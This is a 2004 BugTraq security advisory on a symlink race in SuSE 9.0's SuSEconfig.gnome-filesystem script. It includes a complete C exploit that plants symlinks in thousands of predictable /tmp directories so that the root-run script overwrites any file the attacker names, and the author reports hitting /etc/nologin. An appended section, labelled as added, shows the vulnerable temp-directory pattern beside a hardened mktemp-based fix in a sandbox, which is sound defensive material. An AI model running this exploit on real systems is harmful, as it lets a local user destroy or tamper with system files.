BugTraq
SuSE linux 9.0 YaST config Script [exploit] Jan 13 2004 08:28PM
Rene (l0om excluded org)


Author: l0om <l0om (at) excluded (dot) org>
Date: 12.01.2004
page: www.excluded.org

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem

There is a symlink problem in the SuSEconfig.gnome-filesystem script. A normal user can create and overwrite every file on the system. This script gets executed after a configuration change by the setup tool YaST. So if you have installed gnome or parts of gnome, check this out.

When this script gets executed by YaST after a configuration change, it does the following:

TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]

The env variable $RANDOM includes a random number. In my tests this number goes up from 1 to 33000. But also if it goes up to 65535 it is still vulnerable to a symlink attack. This is nearly as bad as the symlink problem which has been found on SuSE 8.2. On 8.2 a SuSEconf script has created a link with the $$ at the file end.

I have used a little exploit written in C which creates the directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to 33000. In every directory I have created a symlink to a file which I want to create or to overwrite. As the filename I have taken the $TEMP/found and let it point to some file. In my test I have taken the /etc/nologin - and hey - it has worked!

have phun!

*******************************************************************/

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <unistd.h>     /* read(), symlink() */
#include <string.h>     /* strcat() */
#include <sys/types.h>
#include <sys/stat.h>   /* mkdir(), umask() */

/* directory prefix used by the SuSEconfig script; $RANDOM is appended to it */
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
    int i;
    char buf[150];

    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om <l0om (at) excluded (dot) org>\n");
    printf("\t WWW.EXCLUDED.ORG\n\n");

    if(argc != 2) {
        printf("usage: %s <destination-file>\n",argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
    /* wait for one key press on standard input */
    read(STDIN_FILENO, buf, 1);

    umask(0000);
    printf("working\n\n");

    /* one directory per candidate $RANDOM value */
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf),"%s%d",PATH,i);
        if(mkdir(buf,00777) == -1) {
            fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
            exit(0xff);
        }
        if(!(i%1000))printf(".");

        /* the script later runs "echo >$TEMP/found", so the link is named "found" */
        strcat(buf, "/found");
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
            exit(0xff);
        }
    }

    printf("\ndone!\n");
    printf("next time the SuSE.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n",argv[1]);

    return(0x00);
} /* i cant wait for the new gobbles comic!! */

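For maintainers of similar scripts, the temp-directory pattern quoted in the post is shown here beside a hardened form, as an added example that is not part of the original post or of SuSE's script. The function names and the sandbox layout are assumptions, and everything runs inside a private directory rather than the real /tmp.

```shell
#!/bin/sh
# Constructed demo: all paths live under a private sandbox directory.

# Pattern from the advisory: guessable name, mkdir result ignored,
# and a redirect that follows whatever already sits at $TEMP/found.
vulnerable_write() {    # $1 = base dir, $2 = value standing in for $RANDOM
    TEMP="$1/tmp.SuSEconfig.gnome-filesystem.$2"
    mkdir "$TEMP" 2>/dev/null || :    # failure ignored, as in the quoted script
    echo >"$TEMP/found"
}

# Hardened form: mktemp -d creates a fresh 0700 directory under an
# unpredictable name or fails; noclobber (set -C) makes the redirect
# refuse to write through anything that already exists.
hardened_write() {      # $1 = base dir
    TEMP=$(mktemp -d "$1/tmp.SuSEconfig.gnome-filesystem.XXXXXXXXXX") || return 1
    ( set -C; echo >"$TEMP/found" ) || { rm -rf "$TEMP"; return 1; }
    rm -rf "$TEMP"
}

# Sandbox in which the directory and the "found" link already exist
# before the script runs, pointing at a file that must not change.
demo() {
    box=$(mktemp -d) || return 1
    printf 'important\n' >"$box/victim"
    mkdir "$box/tmp.SuSEconfig.gnome-filesystem.1"
    ln -s "$box/victim" "$box/tmp.SuSEconfig.gnome-filesystem.1/found"

    hardened_write "$box" || return 1
    after_hardened=$(cat "$box/victim")      # still intact

    vulnerable_write "$box" 1
    after_vulnerable=$(cat "$box/victim")    # truncated through the link

    rm -rf "$box"
    echo "hardened=$after_hardened vulnerable=$after_vulnerable"
}

demo
```

A real script would also remove its temporary directory from an exit trap instead of inline.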